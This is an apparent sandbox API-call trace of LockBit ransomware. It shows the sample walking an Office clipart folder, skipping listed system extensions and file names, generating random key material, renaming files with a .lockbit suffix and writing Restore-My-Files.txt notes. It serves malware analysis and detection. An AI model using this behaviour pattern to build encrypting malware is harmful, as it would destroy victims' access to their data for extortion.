[0177.787] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.787] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.787] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf461c100, ftCreationTime.dwHighDateTime=0x1bd4c00, ftLastAccessTime.dwLowDateTime=0x5aca0270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf461c100, ftLastWriteTime.dwHighDateTime=0x1bd4c00, nFileSizeHigh=0x0, nFileSizeLow=0x326, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY01462_.WMF", cAlternateFileName="")) returned 1 [0177.787] lstrcmpiW (lpString1=".", lpString2="SY01462_.WMF") returned -1 [0177.787] lstrcmpiW (lpString1="..", lpString2="SY01462_.WMF") returned -1 [0177.787] PathFindExtensionW (pszPath="SY01462_.WMF") returned=".WMF" [0177.787] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.787] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.787] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.787] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.787] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.787] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.787] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.787] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.787] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.787] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.788] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.788] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.789] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.789] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.789] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.789] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.789] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.789] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.789] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.789] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.789] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.789] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.789] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.789] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.789] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.789] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.789] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.789] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SY01462_.WMF") returned -1 [0177.789] lstrcmpiW (lpString1="ntldr", lpString2="SY01462_.WMF") returned -1 [0177.789] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SY01462_.WMF") returned -1 [0177.789] lstrcmpiW (lpString1="bootsect.bak", lpString2="SY01462_.WMF") returned -1 [0177.789] lstrcmpiW (lpString1="autorun.inf", lpString2="SY01462_.WMF") returned -1 [0177.789] lstrcmpiW (lpString1="thumbs.db", lpString2="SY01462_.WMF") returned 1 [0177.789] lstrcmpiW (lpString1="iconcache.db", lpString2="SY01462_.WMF") returned -1 [0177.789] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.789] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01462_.WMF") returned=".WMF" [0177.789] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.790] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.790] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.791] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.791] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.791] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.791] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01462_.WMF.lockbit") returned 72 [0177.791] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01462_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01462_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0177.794] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.794] malloc (_Size=0x40068) returned 0x3df0008 [0177.794] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=806) returned 1 [0177.794] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.794] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0177.794] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.795] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.795] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0177.795] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0177.797] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01462_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01462_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.797] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.797] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.798] free (_Block=0x1fa2ed8) [0177.798] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01462_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.798] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.798] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.798] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6e15600, ftCreationTime.dwHighDateTime=0x1bd4bf8, ftLastAccessTime.dwLowDateTime=0x6d43ce90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa6e15600, ftLastWriteTime.dwHighDateTime=0x1bd4bf8, nFileSizeHigh=0x0, nFileSizeLow=0x470, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY01491_.WMF", cAlternateFileName="")) returned 1 [0177.798] lstrcmpiW (lpString1=".", lpString2="SY01491_.WMF") returned -1 [0177.798] lstrcmpiW (lpString1="..", lpString2="SY01491_.WMF") returned -1 [0177.798] PathFindExtensionW (pszPath="SY01491_.WMF") returned=".WMF" [0177.798] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.798] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.799] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.800] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.800] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.801] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.801] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.801] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.801] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SY01491_.WMF") returned -1 [0177.801] lstrcmpiW (lpString1="ntldr", lpString2="SY01491_.WMF") returned -1 [0177.801] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SY01491_.WMF") returned -1 [0177.801] lstrcmpiW (lpString1="bootsect.bak", lpString2="SY01491_.WMF") returned -1 [0177.801] lstrcmpiW (lpString1="autorun.inf", lpString2="SY01491_.WMF") returned -1 [0177.801] lstrcmpiW (lpString1="thumbs.db", lpString2="SY01491_.WMF") returned 1 [0177.801] lstrcmpiW (lpString1="iconcache.db", lpString2="SY01491_.WMF") returned -1 [0177.801] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.801] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01491_.WMF") returned=".WMF" [0177.801] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.801] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.801] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.801] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.801] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.801] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.801] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.801] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.801] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.802] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.802] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01491_.WMF.lockbit") returned 72 [0177.802] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01491_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy01491_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a4 [0177.804] CreateIoCompletionPort (FileHandle=0x2a4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.804] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.804] GetFileSizeEx (in: hFile=0x2a4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1136) returned 1 [0177.804] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.804] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.805] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.805] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.805] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.805] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.847] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01491_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01491_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.847] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.847] NtSetInformationFile (FileHandle=0x2a4, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0177.847] free (_Block=0x1fa2ed8) [0177.847] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01491_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.847] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.847] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.847] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45a48d00, ftCreationTime.dwHighDateTime=0x1bd4bce, ftLastAccessTime.dwLowDateTime=0x5aca0270, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x45a48d00, ftLastWriteTime.dwHighDateTime=0x1bd4bce, nFileSizeHigh=0x0, nFileSizeLow=0x13c4, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY01563_.WMF", cAlternateFileName="")) returned 1 [0177.847] lstrcmpiW (lpString1=".", lpString2="SY01563_.WMF") returned -1 [0177.847] lstrcmpiW (lpString1="..", lpString2="SY01563_.WMF") returned -1 [0177.847] PathFindExtensionW (pszPath="SY01563_.WMF") returned=".WMF" [0177.847] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.848] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.849] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.849] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SY01563_.WMF") returned -1 [0177.849] lstrcmpiW (lpString1="ntldr", lpString2="SY01563_.WMF") returned -1 [0177.849] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SY01563_.WMF") returned -1 [0177.850] lstrcmpiW (lpString1="bootsect.bak", lpString2="SY01563_.WMF") returned -1 [0177.850] lstrcmpiW (lpString1="autorun.inf", lpString2="SY01563_.WMF") returned -1 [0177.850] lstrcmpiW (lpString1="thumbs.db", lpString2="SY01563_.WMF") returned 1 [0177.850] lstrcmpiW (lpString1="iconcache.db", lpString2="SY01563_.WMF") returned -1 [0177.850] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.850] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY01563_.WMF") returned=".WMF" [0177.850] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.850] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.850] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.850] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.850] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.850] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.850] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.850] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.850] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.850] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 